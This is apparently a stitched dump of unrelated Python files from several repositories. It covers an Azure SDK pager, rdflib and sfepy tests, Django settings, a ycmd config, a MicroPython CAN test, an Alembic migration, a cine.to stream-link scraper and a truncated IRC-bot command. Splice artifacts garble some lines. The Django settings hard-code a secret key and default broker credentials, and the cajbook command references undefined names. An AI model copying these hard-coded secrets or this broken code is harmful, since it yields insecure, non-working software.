# Copyright (c) Microso | ft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------- | -----------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_operations_request(
    **kwargs: Any
) -> HttpRequest:
    """Build the GET request that lists Microsoft.DomainRegistration Csm operations."""
    api_version = "2021-01-15"
    accept = "application/json"

    # URL — callers may substitute a pre-rendered template (e.g. a next_link).
    url = kwargs.pop("template_url", '/providers/Microsoft.DomainRegistration/operations')

    # Query parameters: only the api-version is required here.
    query_parameters = kwargs.pop("params", {})  # type: Dict[str, Any]
    query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')

    # Headers: this operation always negotiates JSON.
    header_parameters = kwargs.pop("headers", {})  # type: Dict[str, Any]
    header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')

    return HttpRequest(
        method="GET",
        url=url,
        params=query_parameters,
        headers=header_parameters,
        **kwargs
    )
class DomainRegistrationProviderOperations(object):
    """DomainRegistrationProviderOperations operations.
    You should not instantiate this class directly. Instead, you should create a Client instance that
    instantiates it for you and attaches it as an attribute.
    :ivar models: Alias to model classes used in this operation group.
    :type models: ~azure.mgmt.web.v2021_01_15.models
    :param client: Client for service requests.
    :param config: Configuration of service client.
    :param serializer: An object model serializer.
    :param deserializer: An object model deserializer.
    """
    models = _models
    def __init__(self, client, config, serializer, deserializer):
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    @distributed_trace
    def list_operations(
        self,
        **kwargs: Any
    ) -> Iterable["_models.CsmOperationCollection"]:
        """Implements Csm operations Api to exposes the list of available Csm Apis under the resource
        provider.
        Description for Implements Csm operations Api to exposes the list of available Csm Apis under
        the resource provider.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either CsmOperationCollection or the result of
         cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2021_01_15.models.CsmOperationCollection]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.CsmOperationCollection"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        # Build either the first-page request (from the operation template)
        # or a follow-up request for a continuation link.
        def prepare_request(next_link=None):
            if not next_link:
                request = build_list_operations_request(
                    template_url=self.list_operations.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_operations_request(
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        # Deserialize one page into (next_link, iterator of elements).
        def extract_data(pipeline_response):
            deserialized = self._deserialize("CsmOperationCollection", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        # Fetch one page, mapping HTTP errors to ARM-style exceptions.
        def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, pipeline_response)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_operations.metadata = {'url': '/providers/Microsoft.DomainRegistration/operations'}  # type: ignore
|
lrowe/rdflib | test/test_trig.py | Python | bsd-3-clause | 1,653 | 0.012704 | import unittest
import rdflib
import re
from rdflib.py3compat import b
class TestTrig(unittest.TestCase):
    """Serialization tests for rdflib's TriG format.

    (Class header restored from corrupted source; deprecated ``assert_``
    alias replaced by ``assertTrue``.)
    """

    def testEmpty(self):
        # An empty graph must still serialize without raising.
        g = rdflib.Graph()
        s = g.serialize(format='trig')
        self.assertTrue(s is not None)

    def testRepeatTriples(self):
        # The same triple asserted in two named graphs appears in both
        # contexts, and no empty graph blocks ("{}") may be emitted.
        g = rdflib.ConjunctiveGraph()
        g.get_context('urn:a').add((rdflib.URIRef('urn:1'),
                                    rdflib.URIRef('urn:2'),
                                    rdflib.URIRef('urn:3')))
        g.get_context('urn:b').add((rdflib.URIRef('urn:1'),
                                    rdflib.URIRef('urn:2'),
                                    rdflib.URIRef('urn:3')))
        self.assertEqual(len(g.get_context('urn:a')), 1)
        self.assertEqual(len(g.get_context('urn:b')), 1)
        s = g.serialize(format='trig')
        self.assertTrue(b('{}') not in s)  # no empty graphs!

    def testSameSubject(self):
        # Two triples sharing a subject but living in different named graphs
        # must each be serialized exactly once, in their own graph block.
        g = rdflib.ConjunctiveGraph()
        g.get_context('urn:a').add((rdflib.URIRef('urn:1'),
                                    rdflib.URIRef('urn:p1'),
                                    rdflib.URIRef('urn:o1')))
        g.get_context('urn:b').add((rdflib.URIRef('urn:1'),
                                    rdflib.URIRef('urn:p2'),
                                    rdflib.URIRef('urn:o2')))
        self.assertEqual(len(g.get_context('urn:a')), 1)
        self.assertEqual(len(g.get_context('urn:b')), 1)
        s = g.serialize(format='trig')
        self.assertEqual(len(re.findall(b("p1"), s)), 1)
        self.assertEqual(len(re.findall(b("p2"), s)), 1)
        self.assertTrue(b('{}') not in s)  # no empty graphs!
|
rgeorgiev583/BrainfuckInterpreter | main.py | Python | gpl-3.0 | 263 | 0.003802 | __author__ = 'radoslav'
import bfplatform

# "Hello World!" in Brainfuck, run on a character-I/O interpreter.
# (Identifier restored from corrupted source: create_bfi_stdio_char.)
bfi = bfplatform.create_bfi_stdio_char(
    "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]>>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."
)
bfi.run()

# Run the numeric-I/O variant of the interpreter on user input.
bfi = bfplatform.create_bfi_stdio_numeric()
bfi.run()
|
mosquito/TelePY | pytils/test/templatetags/helpers.py | Python | gpl-3.0 | 2,137 | 0.006083 | # -*- coding: utf-8 -*-
# pytils - russian-specific string utils
# Copyright (C) 2006-2009 Yury Yurevich
#
# http://pyobject.ru/projects/pytils/
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation, version 2
# of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
"""
Helpers for templatetags' unit tests in Django webframework
"""
from django.conf import settings
# Encoding used both for Django's DEFAULT_CHARSET and for pseudo-str
# conversion in pstr() below.
encoding = 'utf-8'
# Minimal standalone Django configuration so pytils' templatetags can be
# loaded and rendered outside a real project (must run before the
# django.template imports below).
settings.configure(
    TEMPLATE_DIRS=(),
    TEMPLATE_CONTEXT_PROCESSORS=(),
    TEMPLATE_LOADERS=(),
    INSTALLED_APPS=('pytils',),
    DEFAULT_CHARSET=encoding,
)
from django import template
from django.template import loader
from pytils.templatetags import pseudo_str
import unittest
def pstr(ustr):
    """
    Provide/Pseudo unicode

    Thin wrapper over pseudo_str using the module-wide ``encoding``;
    kept so templates and expected results read concisely in tests.
    """
    return pseudo_str(ustr, encoding, None)
class TemplateTagTestCase(unittest.TestCase):
    """
    TestCase for testing template tags and filters
    """
    def check_template_tag(self, template_name, template_string, context, result_string):
        """
        Method validates output of template tag or filter
        @param template_name: name of template
        @type template_name: C{str}
        @param template_string: contents of template
        @type template_string: C{str} or C{unicode}
        @param context: rendering context
        @type context: C{dict}
        @param result_string: reference output
        @type result_string: C{str} or C{unicode}
        """
        def test_template_loader(template_name, template_dirs=None):
            return pstr(template_string), template_name
        # Monkey-patch Django's template source loaders so get_template()
        # serves template_string directly, without touching the filesystem.
        # NOTE(review): this relies on a legacy django.template.loader
        # internal; confirm against the Django version pinned by the project.
        loader.template_source_loaders = [test_template_loader,]
        output = loader.get_template(template_name).render(template.Context(context))
        self.assertEquals(output, pstr(result_string))
|
Valloric/ycmd | .ycm_extra_conf.py | Python | gpl-3.0 | 7,079 | 0.022461 | # This file is NOT licensed under the GPLv3, which is the license for the rest
# of YouCompleteMe.
#
# Here's the license text for this file:
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org/>
from distutils.sysconfig import get_python_inc
import platform
import os.path as p
import subprocess
DIR_OF_THIS_SCRIPT = p.abspath( p.dirname( __file__ ) )
DIR_OF_THIRD_PARTY = p.join( DIR_OF_THIS_SCRIPT, 'third_party' )
DIR_OF_WATCHDOG_DEPS = p.join( DIR_OF_THIRD_PARTY, 'watchdog_deps' )
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
database = None
# These are the compilation flags that will be used in case there's no
# compilation database set (by default, one is not set).
# CHANGE THIS LIST OF FLAGS. YES, THIS IS THE DROID YOU HAVE BEEN LOOKING FOR.
flags = [
'-Wall',
'-Wextra',
'-Werror',
'-Wno-long-long',
'-Wno-variadic-macros',
'-fexceptions',
'-DNDEBUG',
# You 100% do NOT need -DUSE_CLANG_COMPLETER and/or -DYCM_EXPORT in your flags;
# only the YCM source code needs it.
'-DUSE_CLANG_COMPLETER',
'-DYCM_EXPORT=',
'-DYCM_ABSEIL_SUPPORTED',
# THIS IS IMPORTANT! Without the '-x' flag, Clang won't know which language to
# use when compiling headers. So it will guess. Badly. So C++ headers will be
# compiled as C headers. You don't want that so ALWAYS specify the '-x' flag.
# For a C project, you would set this to 'c' instead of 'c++'.
'-x',
'c++',
'-isystem',
'cpp/absl',
'-isystem',
'cpp/pybind11',
'-isystem',
'cpp/whereami',
'-isystem',
'cpp/BoostParts',
'-isystem',
get_python_inc(),
'-isystem',
'cpp/llvm/include',
'-isystem',
'cpp/llvm/tools/clang/include',
'-I',
'cpp/ycm',
'-I',
'cpp/ycm/ClangCompleter',
'-isystem',
'cpp/ycm/tests/gmock/googlemock/include',
'-isystem',
'cpp/ycm/tests/gmock/googletest/include',
'-isystem',
'cpp/ycm/benchmarks/benchmark/include',
'-std=c++17',
]
# Set this to the absolute path to the folder (NOT the file!) containing the
# compile_commands.json file to use that instead of 'flags'. See here for
# more details: http://clang.llvm.org/docs/JSONCompilationDatabase.html
#
# You can get CMake to generate this file for you by adding:
# set( CMAKE_EXPORT_COMPILE_COMMANDS 1 )
# to your CMakeLists.txt file.
#
# Most projects will NOT need to set this to anything; you can just change the
# 'flags' list of compilation flags. Notice that YCM itself uses that approach.
compilation_database_folder = ''
def IsHeaderFile( filename ):
  """Return True when *filename* carries a C/C++ header extension."""
  return p.splitext( filename )[ 1 ] in ( '.h', '.hxx', '.hpp', '.hh' )
def FindCorrespondingSourceFile( filename ):
  """For a header, return its sibling source file when one exists on disk.

  Non-header files, and headers with no matching source next to them, are
  returned unchanged.
  """
  if IsHeaderFile( filename ):
    stem = p.splitext( filename )[ 0 ]
    for extension in SOURCE_EXTENSIONS:
      candidate = stem + extension
      if p.exists( candidate ):
        return candidate
  return filename
def PathToPythonUsedDuringBuild():
  """Return the interpreter path recorded at build time, or None if absent."""
  marker = p.join( DIR_OF_THIS_SCRIPT, 'PYTHON_USED_DURING_BUILDING' )
  try:
    with open( marker ) as marker_file:
      return marker_file.read().strip()
  except OSError:
    # Marker file missing/unreadable: the build never wrote it.
    return None
def Settings( **kwargs ):
  """ycmd entry point: return per-file completer settings.

  For C-family files, resolve compile flags either from the configured
  compilation database or from the static `flags` list above; for Python,
  pin the interpreter recorded during the build.
  """
  # Do NOT import ycm_core at module scope.
  import ycm_core
  global database
  # Lazily open the compilation database on first use (module-level cache).
  if database is None and p.exists( compilation_database_folder ):
    database = ycm_core.CompilationDatabase( compilation_database_folder )
  language = kwargs[ 'language' ]
  if language == 'cfamily':
    # If the file is a header, try to find the corresponding source file and
    # retrieve its flags from the compilation database if using one. This is
    # necessary since compilation databases don't have entries for header files.
    # In addition, use this source file as the translation unit. This makes it
    # possible to jump from a declaration in the header file to its definition
    # in the corresponding source file.
    filename = FindCorrespondingSourceFile( kwargs[ 'filename' ] )
    if not database:
      # No database configured: fall back to the static flags list.
      return {
        'flags': flags,
        'include_paths_relative_to_dir': DIR_OF_THIS_SCRIPT,
        'override_filename': filename
      }
    compilation_info = database.GetCompilationInfoForFile( filename )
    if not compilation_info.compiler_flags_:
      return {}
    # Bear in mind that compilation_info.compiler_flags_ does NOT return a
    # python list, but a "list-like" StringVec object.
    final_flags = list( compilation_info.compiler_flags_ )
    # NOTE: This is just for YouCompleteMe; it's highly likely that your project
    # does NOT need to remove the stdlib flag. DO NOT USE THIS IN YOUR
    # ycm_extra_conf IF YOU'RE NOT 100% SURE YOU NEED IT.
    try:
      final_flags.remove( '-stdlib=libc++' )
    except ValueError:
      pass
    return {
      'flags': final_flags,
      'include_paths_relative_to_dir': compilation_info.compiler_working_dir_,
      'override_filename': filename
    }
  if language == 'python':
    return {
      'interpreter_path': PathToPythonUsedDuringBuild()
    }
  # Unknown language: no special settings.
  return {}
def PythonSysPath( **kwargs ):
  """Prepend ycmd's vendored third-party packages to the completer's sys.path."""
  sys_path = kwargs[ 'sys_path' ]
  interpreter_path = kwargs[ 'interpreter_path' ]
  # Ask the interpreter itself for its major version.
  # NOTE(review): major_version is computed but never used below — the
  # watchdog 'lib3' path is hard-coded; confirm whether this is intentional.
  major_version = subprocess.check_output( [
    interpreter_path, '-c', 'import sys; print( sys.version_info[ 0 ] )' ]
  ).rstrip().decode( 'utf8' )
  # Vendored packages take priority over anything already on sys.path.
  sys_path[ 0:0 ] = [ p.join( DIR_OF_THIS_SCRIPT ),
                      p.join( DIR_OF_THIRD_PARTY, 'bottle' ),
                      p.join( DIR_OF_THIRD_PARTY, 'regex-build' ),
                      p.join( DIR_OF_THIRD_PARTY, 'frozendict' ),
                      p.join( DIR_OF_THIRD_PARTY, 'jedi_deps', 'jedi' ),
                      p.join( DIR_OF_THIRD_PARTY, 'jedi_deps', 'parso' ),
                      p.join( DIR_OF_WATCHDOG_DEPS, 'watchdog', 'build', 'lib3' ),
                      p.join( DIR_OF_WATCHDOG_DEPS, 'pathtools' ),
                      p.join( DIR_OF_THIRD_PARTY, 'waitress' ) ]
  # numpydoc goes last so it never shadows real packages.
  sys_path.append( p.join( DIR_OF_THIRD_PARTY, 'jedi_deps', 'numpydoc' ) )
  return sys_path
|
def init():
    """Initialise giwyn's module-level mutable state.

    Must be called once at startup before any other settings access; safe to
    call again to reset state.
    """
    global ARGS
    global CONFIG_FILE_CONTENT
    global CONFIG_FILE_NAME
    global CONFIG_FILE_PATH
    global GIT_OBJECTS
    ARGS = []
    CONFIG_FILE_CONTENT = []
    # Restored from corrupted source: the config file is named ".giwyn".
    CONFIG_FILE_NAME = ".giwyn"
    CONFIG_FILE_PATH = ""
    GIT_OBJECTS = []
|
vlukes/sfepy | tests/test_input_thermo_elasticity_ess.py | Python | bsd-3-clause | 219 | 0.009132 | from __future__ import absolute_import
# Input problem description and expected output name for sfepy's generic
# input-file test runner (path restored from corrupted source).
input_name = '../examples/multi_physics/thermo_elasticity_ess.py'
output_name = 'test_thermo_elasticity_ess.vtk'
from tests_basic import TestInput


class Test(TestInput):
    """Run TestInput's generic machinery on the thermo-elasticity example.

    The module-level input_name/output_name constants above select the
    problem file and the expected VTK output.
    """
    pass
|
caspyyy/SCRAPY_DDS | example_project/example_project/settings.py | Python | bsd-3-clause | 5,820 | 0.001546 | # Django settings for example_project project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_ROOT, 'stockExchange.db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = False
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = False
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'h51vphv5#0957l2o(jrdsai!l54h(kh&-m^4-1xdd7nwa6=1^^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'example_project.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'example_project.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# Applications enabled for the example project (corrupted separator tokens
# removed around 'django.contrib.messages' and 'south').
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'django.contrib.admin',
    # Uncomment the next line to enable admin documentation:
    # 'django.contrib.admindocs',
    'south',
    'kombu.transport.django',
    'djcelery',
    'dynamic_scraper',
    'open_news',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# django-celery settings
import djcelery
djcelery.setup_loader()
BROKER_HOST = "localhost"
BROKER_PORT = 5672
BROKER_BACKEND = "django"
BROKER_USER = "guest"
BROKER_PASSWORD = "guest"
BROKER_VHOST = "/"
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
|
Vogtinator/micropython | tests/pyb/can.py | Python | mit | 841 | 0.002378 | from pyb import CAN
# Reset all filter banks, then exercise CAN bus 1 in loopback mode so sent
# frames are received locally.
CAN.initfilterbanks(14)
can = CAN(1)
print(can)
can.init(CAN.LOOPBACK)
print(can)
print(can.any(0))
# Catch all filter
can.setfilter(0, CAN.MASK16, 0, (0, 0, 0, 0))
can.send('abcd', 123)
print(can.any(0))
print(can.recv(0))
# Out-of-range standard IDs: exercise how send/recv handle them.
can.send('abcd', -1)
print(can.recv(0))
can.send('abcd', 0x7FF + 1)
print(can.recv(0))
# Test too long message
try:
    can.send('abcdefghi', 0x7FF)
except ValueError:
    print('passed')
else:
    print('failed')
del can
# Testing extended IDs
can = CAN(1, CAN.LOOPBACK, extframe = True)
# Catch all filter
can.setfilter(0, CAN.MASK32, 0, (0, 0))
print(can)
try:
    # With extended frames enabled, IDs above the 11-bit (0x7FF) range are
    # legal, so this send must NOT raise.  (Line restored from corrupted
    # source: can.send('abcde', 0x7FF + 1).)
    can.send('abcde', 0x7FF + 1)
except ValueError:
    print('failed')
else:
    r = can.recv(0)
    if r[0] == 0x7FF + 1 and r[3] == b'abcde':
        print('passed')
    else:
        print('failed, wrong data received')
|
ballouche/navitia | source/sql/alembic/versions/5a590ae95255_manage_frames.py | Python | agpl-3.0 | 1,090 | 0.013761 | """manage frames
Revision ID: 5a590ae95255
Revises: 59f4456a029
Create Date: 2015-11-25 16:43:10.104442
"""
# revision identifiers, used by Alembic.
revision = '5a590ae95255'
down_revision = '14346346596e'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the navitia.frame table and link vehicle_journey rows to it.

    (Corrupted tokens restored: sa.Column(...) for contributor_id and
    op.add_column(...) for vehicle_journey.frame_id.)
    """
    op.create_table('frame',
    sa.Column('id', sa.BIGINT(), nullable=False),
    sa.Column('uri', sa.TEXT(), nullable=False),
    sa.Column('description', sa.TEXT(), nullable=True),
    sa.Column('system', sa.TEXT(), nullable=True),
    sa.Column('start_date', sa.DATE(), nullable=False),
    sa.Column('end_date', sa.DATE(), nullable=False),
    sa.Column('contributor_id', sa.BIGINT(), nullable=False),
    sa.ForeignKeyConstraint(['contributor_id'], [u'navitia.contributor.id'], name=u'contributor_frame_fkey'),
    sa.PrimaryKeyConstraint('id'),
    schema='navitia'
    )
    # Each vehicle journey may optionally reference the frame it came from.
    op.add_column('vehicle_journey', sa.Column('frame_id', sa.BIGINT(), nullable=True), schema='navitia')
def downgrade():
    # Revert upgrade(): drop the referencing column before the table it
    # points at, so the foreign key never dangles.
    op.drop_column('vehicle_journey', 'frame_id', schema='navitia')
    op.drop_table('frame', schema='navitia')
|
repotvsupertuga/tvsupertuga.repository | script.module.openscrapers/lib/openscrapers/sources_openscrapers/de/cine.py | Python | gpl-2.0 | 3,466 | 0.003174 | # -*- coding: UTF-8 -*-
# ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
# .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
# .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
# .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
# .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
# .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
# ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @Daddy_Blamo wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import json
import re
import urllib
import urlparse
from openscrapers.modules import client
from openscrapers.modules import source_utils
class source:
    # Scraper backend for cine.to (German-language sources).  The broad
    # bare-except blocks are the codebase's deliberate best-effort style:
    # any failure yields an empty/None result rather than crashing the
    # aggregation loop.
    def __init__(self):
        self.priority = 1
        self.language = ['de']
        self.domains = ['cine.to']
        self.base_link = 'https://cine.to'
        self.request_link = '/request/links'
        self.out_link = '/out/%s'
    def movie(self, imdb, title, localtitle, aliases, year):
        # The "url" handed back to sources() is just the urlencoded imdb id.
        try:
            return urllib.urlencode({'imdb': imdb})
        except:
            return
    def sources(self, url, hostDict, hostprDict):
        # Query cine.to's JSON endpoint for hoster links and normalize them
        # into the scraper framework's source-dict format.
        sources = []
        try:
            if url == None:
                return sources
            data = urlparse.parse_qs(url)
            data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
            # The endpoint wants a bare numeric ID (imdb id without "tt").
            data = urllib.urlencode({'ID': re.sub('[^0-9]', '', str(data['imdb'])), 'lang': 'de'})
            data = client.request(urlparse.urljoin(self.base_link, self.request_link), post=data, XHR=True)
            data = json.loads(data)
            # links maps hoster name -> [quality, link1, link2, ...]
            data = [(i, data['links'][i]) for i in data['links'] if 'links' in data]
            data = [(i[0], i[1][0], (i[1][1:])) for i in data]
            for hoster, quli, links in data:
                valid, hoster = source_utils.is_host_valid(hoster, hostDict)
                if not valid: continue
                for link in links:
                    try:
                        sources.append(
                            {'source': hoster, 'quality': 'SD', 'language': 'de', 'url': self.out_link % link,
                             'direct': False, 'debridonly': False})
                    except:
                        pass
            return sources
        except:
            return sources
    def resolve(self, url):
        # Follow cine.to's /out/<id> redirect to the hoster's real URL.
        try:
            url = urlparse.urljoin(self.base_link, url)
            url = client.request(url, output='geturl')
            if self.out_link not in url:
                return url
        except:
            return
|
munin/munin | deprecated/cajbook.py | Python | gpl-2.0 | 7,158 | 0.002375 | """
Loadable.Loadable subclass
"""
# This file is part of Munin.
# Munin is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# Munin is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Munin; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# This work is Copyright (C)2006 by Andreas Jacobsen
# Individual portions may be copyright by individual contributors, and
# are included in this collective work with permission of the copyright
# owners.
class cajbook(loadable.loadable):
    def __init__(self, client, conn, cursor):
        # Access level 50: only sufficiently privileged users may book.
        loadable.loadable.__init__(self, client, conn, cursor, 50)
        # Parses "<x>:<y>:<z> <eta|tick> [yes]"; separators may be ". :-".
        self.paramre = re.compile(r"^\s*(\d+)[. :-](\d+)[. :-](\d+)\s+(\d+)(\s+(yes))?")
        self.usage = self.__class__.__name__ + " <x:y:z> (<eta>|<landing tick>)"
def execute(self, nick, username, host, target, prefix, command, user, access):
m = self.commandre.search(command)
if not m:
return 0
m = self.paramre.search(irc_msg.command_parameters)
if not m:
self.client.reply(prefix, nick, target, "Usage: %s" % (self.usage,))
return 0
x = m.group(1)
y = m.group(2)
z = m.group(3)
when = int(m.group(4))
override = m.group(6)
if access < self.level:
self.client.reply(
prefix,
nick,
target,
"You do not have enough access to use this command",
)
return 0
if int(x) != 6 or int(y) != 8:
self.client.reply(
prefix,
nick,
target,
"This command only works for the galaxy 2:5, if you need a normal booking try !book",
)
return 0
p = loadable.planet(x=x, y=y, z=z)
if not p.load_most_recent(self.conn, self.client, self.cursor):
self.client.reply(
prefix, nick, target, "No planet matching '%s:%s:%s' found" % (x, y, z)
)
return 1
else:
i = loadable.intel(pid=p.id)
if not i.load_from_db(self.conn, self.client, self.cursor):
pass
else:
